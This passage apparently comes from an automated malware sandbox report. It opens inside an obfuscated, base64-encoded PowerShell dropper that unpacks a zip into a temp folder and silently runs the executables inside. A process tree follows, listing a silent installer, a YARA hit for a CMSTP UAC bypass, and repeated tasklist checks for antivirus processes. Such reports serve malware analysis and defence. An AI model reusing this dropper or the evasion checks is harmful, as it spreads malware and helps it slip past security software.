CAALQBOAGEAbQBlACAAQQBwAFAARABBAFQAYQBQAGEAVABIACAALQBWAGEAbAB1AGUAIAAoAEQAeQBFAGMARwAwAFEAOgA6ACgANgBTAHYAewAxAH0AewAwAH0ANgBTAHYAIAAtAGYAbABUACcAKwAnAFYAZQBsAFQAVgAsAGwAVABWAEMAbwBtAGIAaQBuACcAKwAnAGwAVABWACkALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsAZQBCAFUAbQBOAEIAVQBtAFYAOgBsAG8AYwBBAEwAQgBVAG0AQQBQAFAARABBAHQAQQB9ACwAIABEAHkARQB7AFUAJwArACcAbgBJAHEAdQBFAEIAVQBtAEYATwBCAFUAbQAnACsAJwBMAEQAZQBSAG4AQgBVAG0AQQBNAEUAfQAnACsAJwApACkACgAgACAAIAAgAC4AKAA2AFMAdgB7ADEAfQB7ADAAfQA2AFMAdgAgAC0AZgBsAFQAVgBJAHQAJwArACcAZQBtAGwAVABWACwAJwArACcAbABUAFYATgBlAHcALQBsAFQAVgApACAALQBJAHQAZQBtAFQAeQBwAGUAIAAoADYAUwB2AHsAMAB9AHsAMgAnACsAJwB9AHsAMQB9ADYAUwB2ACcAKwAnAC0AZgBsAFQAVgBEAGkAcgBsAFQAVgAsAGwAVABWAHkAJwArACcAbABUAFYALABsAFQAVgBlAGMAdABvAHIAbABUAFYAKQAgAC0AUABhAHQAaAAgAEQAeQBFAHsAYQBwAEIAVQBtAFAAQgBVAG0AZABhAFQAYQBCAFUAbQBQAGEAVABoAH0AIAAtAEYAbwByAGMAZQAgAHoAbgBxACAALgAoADYAUwB2AHsAMQB9AHsAMAB9ADYAUwB2ACAALQBmACAAbABUAFYAdQB0AC0ATgB1AGwAbABsAFQAVgAsAGwAVABWAE8AbABUAFYAKQAKAAoAIAAgACAAIABTAGUAdAAtAFYAJwArACcAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AJwArACcAZQAgAHQAZQBNAFAAWgBJAHAAUABBAHQAJwArACcAaAAgAC0AVgBhAGwAdQBlACAAKAAoACAAZwBjAGkAIAAgAHYAYQBSAGkAQQBiAGwARQA6AEMAZwAwAFEAIAAgACkALgBWAGEAbAB1AGUAOgA6ACgANgBTAHYAewAxAH0AewAwAH0ANgBTAHYALQBmACAAbABUAFYAbwBtAGIAaQBuAGUAbABUAFYALABsAFQAVgBDAGwAVABWACkAJwArACcALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsARQBuAHYAQgBVAG0AOgB0AEUAQgBVAG0AbQAnACsAJwBwAH0ALAAgADYAUwB2AEQAeQBFAHUAbgBpACcAKwAnAHEAdQBlAEYAbwBsAGQAZQByAE4AYQBtACcAKwAnAGUALgB6AGkAcAA2AFMAdgApACkACgAgACAAIAAgACAAIAAoACAAIABnAEMAaQAgACgANgBTAHYAdgBBADYAUwB2ACsANgBTAHYAcgA2AFMAdgArADYAUwB2AGkAQQBiAGwAZQA6AFUAYgAyAEcAVAA2AFMAdgApACkALgBWAEEAbAB1AGUAOgA6ACgANgBTAHYAewAxAH0AewAzAH0AewAyAH0AewAwAH0ANgBTAHYAIAAtAGYAbABUAFYAbABCAHkAdABlAHMAbABUAFYALABsAFQAVgBXAHIAaQAnACsAJwB0AGwAVABWACwAbABUAFYAbABsAFQAVgAsACcAKwAnAGwAVABWAGUAQQBsAFQAVgApAC4ASQBuAHYAbwBrAGUAKABEAHkARQB7AHQAZQBtAHAAWgBJAHAAQgBVAG0AcABBAEIAVQBtAFQAaAB9ACwAIABEAHkARQB7AG0AZQBNAG8AQgBVAG0AUgBZAEIAVQBtAFMAdABSAEIAVQBtAEUAYQBNAH0ALgAoADYAUwB2AHsAMQB9AHsAMAB9ADYAUwB2AC0AZgBsAFQAVgByAGEAeQBsAFQAVgAsAGwAVABWAFQAbwBBAHIAbABUAFYAKQAuAEkAbgB2AG8AawBlACgAKQApAAoACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAUwBoAGUATABMACAALQBWAGEAbAB1AGUAIAAoAC4AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQA2AFMAdgAgAC0AZgBsAFQAVgBqAGUAYwB0AGwAVABWACwAbABUAFYATgBlAHcALQBsAFQAVgAsAGwAVABWAE8AYgBsAFQAVgApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgANgBTAHYAewAyAH0AewAwAH0AewAzAH0AewA0AH0AewAxACcAKwAnAH0ANgBTAHYALQBmAGwAVABWAHAAbABpAGMAbABUAFYALABsAFQAVgBuAGwAVABWACwAbABUAFYAUwBoAGUAbABsAC4AQQBwAGwAVAAnACsAJwBWACwAbABUAFYAYQBsAFQAVgAsAGwAVABWAHQAaQBvAGwAVABWACkAKQAKACAAIAAnACsAJwAgACAAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB6AGkAcABGAG8AbABkAEUAUgAgAC0AVgBhAGwAdQBlACAAKABEAHkARQB7AHMAaABCAFUAbQBlAGwAbAB9AC4AKAA2AFMAdgB7ADAAfQB7ADEAfQB7ADIAfQA2AFMAJwArACcAdgAnACsAJwAgAC0AZgBsAFQAVgBOAGEAbQBsAFQAVgAsAGwAVABWAGUAUwBwAGEAbABUAFYALABsAFQAVgBjAGUAbABUAFYAKQAuAEkAbgB2AG8AawBlACgARAB5AEUAewB0AEUAbQBwAHoAQgBVAG0ASQBQAHAAQQBCAFUAbQBUAGgAfQApACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAARABlAHMAdAAnACsAJwBJAE4AYQBUAEkATwBuAGYATwBMAGQAZQByACAALQBWAGEAbAB1AGUAIAAoAEQAeQBFAHsAcwBCAFUAbQBoAGUAbABsAH0ALgAoADYAUwB2AHsAMAB9AHsAMQB9AHsAMgB9ADYAUwB2ACAALQBmACAAbABUAFYATgBhAG0AZQBTAHAAYQBsAFQAVgAsAGwAVABWAGMAbABUAFYALABsAFQAVgBlAGwAVABWACkALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsAYQBQAEIAVQBtAFAARABCAFUAbQBBAHQAQgBVAG0AQQBQAGEAVABIAH0AKQApAAoAIAAgACAAIABEAHkARQB7AEQAZQAnACsAJwBCAFUAbQBTAFQAaQBCAFUAbQBOAGEAVABpAG8AQgBVAG0ATgBGAE8ATABkAEUAcgB9AC4AKAA2AFMAdgB7ADAAfQB7ADEAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEMAbwBwAHkASABsAFQAVgAsAGwAVABWAGUAcgBlAGwAVABWACkALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsAWgBpAFAAQgBVAG0ARgBPAEwAQgBVAG0ARABCAFUAbQBlAHIAfQAuACgANgBTAHYAewAxAH0AewAwAH0ANgBTAHYALQBmACAAbABUAFYAdABlAG0AcwBsAFQAVgAsAGwAVABWAEkAbABUAFYAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAMgAwACkAIAAgAAoACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbAAnACsAJwBlACAALQBOAGEAbQBlACAARQB4AEUARgBpAGwAZQBzACAALQAnACsAJwBWAGEAbAB1AGUAIAAoACYAKAA2AFMAJwArACcAdgB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQB7ADQAfQA2AFMAdgAtAGYAbABUAFYASQBsAFQAVgAsAGwAVABWAEcAbABUAFYALABsAFQAVgBlAHQALQBsAFQAVgAsAGwAVABWAEMAaABpAGwAZABsAFQAVgAsAGwAVABWACcAKwAnAHQAZQBtAGwAVABWACkAIAAtACcAKwAnAEYAaQBsAHQAZQByACAAKgAuAEIAVQBtAGUAWABFACAALQBSAGUAYwB1AHIAcwBlACAALQBQAGEAdABoACAARAB5AEUAewBhAFAAQgBVAG0AcABCAFUAbQBkAGEAQgBVAG0AVABBAFAAQQBUAGgAfQApAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACcAKwAnACAAKABEAHkARQB7AEUAQgBVAG0AeABFAEYASQBCAFUAbQBsAGUAfQAgAGkAbgAgAEQAeQBFAHsAZQBCAFUAbQAnACsAJwBYAGUARgBpAGwAQgBVAG0AZQBTAH0AKQAgAHsACgAgACAAIAAgACAAIAAgACAALgAoADYAUwB2AHsAMAB9AHsAMQB9AHsAMgB9ADYAUwB2AC0AZgAgAGwAVABWAFMAdABsAFQAVgAsAGwAVAAnACsAJwBWAGEAcgB0AC0AUAByAG8AYwBsAFQAVgAsAGwAVABWAGUAcwBzAGwAVABWACkAIAAtAEYAaQBsAGUAUABhAHQAaAAgAEQAeQBFAHsARQBYAEIAVQBtAEUARgBJAEIAVQBtAEwAZQB9AC4ANgBTAHYARgB1AEIAVQBtAGwAbABuAEIAVQBtAEEAbQBFADYAUwB2ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAIAAtAFcAYQBpAHQACgAgACAAIAAgAH0ACgAKAH0AKQAKAAoAJgAgAEQAeQBFAHsAcwBDAFIAaQBwAHQAQgBVAG0AQgBMAEIAVQBtAE8AYwBrAH0AIAA+ACAARAB5AEUAewBuAHUAQgBVAG0ATABsAH0AIAAyAD4AJgAxAAoAJwApACAALQByAEUAcABMAEEAYwBlACAAIAAoAFsAQwBoAEEAcgBdADYANgArAFsAQwBoAEEAcgBdADgANQArAFsAQwBoAEEAcgBdADEAMAA5ACkALABbAEMAaABBAHIAXQA5ADYALQByAEUAcABMAEEAYwBlACAAJwA2AFMAdgAnACwAWwBDAGgAQQByAF0AMwA0ACAAIAAtAGMAUgBFAHAATABBAEMAZQAnAEQAeQBFACcALABbAEMAaABBAHIAXQAzADYAIAAtAGMAUgBFAHAATABBAEMAZQAgACcAegBuAHEAJwAsAFsAQwBoAEEAcgBdADEAMgA0ACAAIAAtAGMAUgBFAHAATABBAEMAZQAnAGwAVABWACcALABbAEMAaABBAHIAXQAzADkAKQAgACkA
                                                                                                                                                                                                                                            Imagebase:0xd30000
                                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                            Start time:04:35:50
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                                            Start time:04:36:23
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe"
                                                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                                                            File size:18'610'385 bytes
                                                                                                                                                                                                                                            MD5 hash:0EFDBBF3F5074D596D3E61446B623942
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 18%, ReversingLabs
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                                                            Start time:04:36:25
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe"
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            File size:5'729'136 bytes
                                                                                                                                                                                                                                            MD5 hash:537915708FE4E81E18E99D5104B353ED
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000027.00000002.2156116548.000000000974A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                                                            Start time:04:36:25
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$50362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe"
                                                                                                                                                                                                                                            Imagebase:0xcf0000
                                                                                                                                                                                                                                            File size:3'366'912 bytes
                                                                                                                                                                                                                                            MD5 hash:D8F3F93349755C2BD326DF91966FD6F5
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                                                            Start time:04:36:28
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT
                                                                                                                                                                                                                                            Imagebase:0x590000
                                                                                                                                                                                                                                            File size:18'610'385 bytes
                                                                                                                                                                                                                                            MD5 hash:0EFDBBF3F5074D596D3E61446B623942
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                                            Start time:04:36:29
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$60362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT
                                                                                                                                                                                                                                            Imagebase:0x9c0000
                                                                                                                                                                                                                                            File size:3'366'912 bytes
                                                                                                                                                                                                                                            MD5 hash:D8F3F93349755C2BD326DF91966FD6F5
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                                            Start time:04:36:35
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                                            Start time:04:36:35
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                                                            Start time:04:36:35
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                                                                                                            Imagebase:0x7ff7bda80000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                                                            Start time:04:36:35
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:find /I "wrsa.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff61dd10000
                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                                                            Start time:04:36:36
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                                            Start time:04:36:36
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                                            Start time:04:36:36
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                            Imagebase:0x7ff7bda80000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                                                            Start time:04:36:36
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:find /I "opssvc.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff61dd10000
                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                                                            Start time:04:36:37
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                                                                            Start time:04:36:37
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                                                                            Start time:04:36:37
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                                                                                                            Imagebase:0x7ff7bda80000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                                                                            Start time:04:36:37
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:find /I "avastui.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff61dd10000
                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                                                                            Start time:04:36:39
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                                                                            Start time:04:36:39
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:57
                                                                                                                                                                                                                                            Start time:04:36:39
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                                                                                                            Imagebase:0x7ff7bda80000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:58
                                                                                                                                                                                                                                            Start time:04:36:39
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:find /I "avgui.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff61dd10000
                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:59
                                                                                                                                                                                                                                            Start time:04:36:40
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
